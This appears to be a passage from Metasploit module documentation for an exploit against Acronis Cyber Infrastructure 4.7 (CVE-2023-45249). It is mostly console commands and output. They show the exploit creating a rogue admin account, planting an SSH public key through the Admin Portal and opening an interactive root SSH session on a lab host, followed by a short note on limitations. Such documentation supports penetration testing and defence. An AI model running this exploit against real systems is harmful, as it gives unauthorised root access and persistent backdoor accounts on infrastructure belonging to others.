[*] SSH session 1 opened (192.168.201.8:36279 -> 192.168.201.5:22) at 2024-09-16 17:56:56 +0000

pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
```
### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH using your own SSH private key file in PEM format
Generate your SSH private key with following command `ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key>` or convert your existing SSH private key to PEM format with `ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key`
```msf
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
[*] exec: ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa

Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/aci_rsa
Your public key has been saved in /tmp/aci_rsa.pub
The key fingerprint is:
SHA256:H1Ewu7NLZdYIV4SQZPhsaGkXb/IG9fQgZEjqfKBRTIg root@cerberus
The key's randomart image is:
+---[RSA 2048]----+
|     . +o+B*+oo  |
|    E ..oo+=+.o  |
|      . o=++.+ o |
|       ==.B=oo. .|
|      .oSo=== .  |
|         o Bo    |
|          +.     |
|         . .     |
|          .      |
+----[SHA256]-----+
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
target => 1
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set PRIV_KEY_FILE /tmp/aci_rsa
PRIV_KEY_FILE => /tmp/aci_rsa
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
rhosts => 192.168.201.5
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.7.1-53
[*] Creating admin user gzarzyh with password XiloxPsdto for access at the Acronis Admin Portal.
[*] Saving admin credentials at the msf database.
[*] Using your own SSH private key file: /tmp/aci_rsa in PEM format.
[*] Saving SSH public and private key pair at the msf database.
[*] Uploading SSH public key at the Acronis Admin Portal.
[*] Authenticating with SSH private key.
[*] Executing Interactive SSH for generic/ssh/interact
[*] SSH session 1 opened (192.168.201.8:40083 -> 192.168.201.5:22) at 2024-09-20 09:40:22 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
ls -l .ssh
total 4
-rw------- 1 root root 872 Sep 20 11:40 authorized_keys
cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXAQCgTE9Pci1+btM3Gcj9RXqpp4FV2YCUPxSCKZXqA8sw7YfZcYXNw3s18Cn/JvA1FpuxNQ6h017hHISu7llrOsryawOH7T2ZKNitPs6NM98r0gfMkwHt9PF1CXQOHynr63hRpCYhNPm33IAEEf/I4uhlav2L8zFQCqenKh+lFHB4UwwKsIsmEdcOgFtKdZe8qcFBwUOnVIj22w1fFrUJtVtQQswKo1/1K95lsPFm+dMZWGHYsUaN0lxqlRaOwyX3Qk5oBYcsMVop7yd5szpBpWij65S6qong5lsWmmuN7TlnQxFa0mMefJbUHApecLEaYwRD93kHPuFczDUE4ECP root VSTOR-KEY-ID:497fc430-6ad2-4957-9fb3-4477efadb923
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqHOPvR3vsXkWYJP4vE109/ZnUh64jsMqMb+x66q3+D86rts/ST4smpMjQpL2uwfrn3KHKwVmH7vMYb07q4F8M2nw4TgzYcsXONqAyxmbW0ZJ3P3CdlXXiXMvyUmy55OyVgaBnjoiE1GJxXnssCqPMkf0MaZfZqaaBk3onaKnJ4pRROHe1LEaagSM7dOHjS1F6ViVUYtcfFLQfXj4Q7WsWS5uSUy6HkxDn5PNvzUli7SDJ5aPTDqmmeDjzoVlUl7ZP4CYZlrTpZ1v0C0IuI3qlZmuHPuGaCDN7ymPsRUV71aqv3 root VSTOR-KEY-ID:1966f610-e22a-4147-bec3-4cfb945bdee7
```

## Limitations
When using your own SSH private key, be aware of the fact that you can not upload the same SSH public key twice via Acronis Web Portal. Duplicate SSH public keys are not allowed and the exploit will fail if this occurs.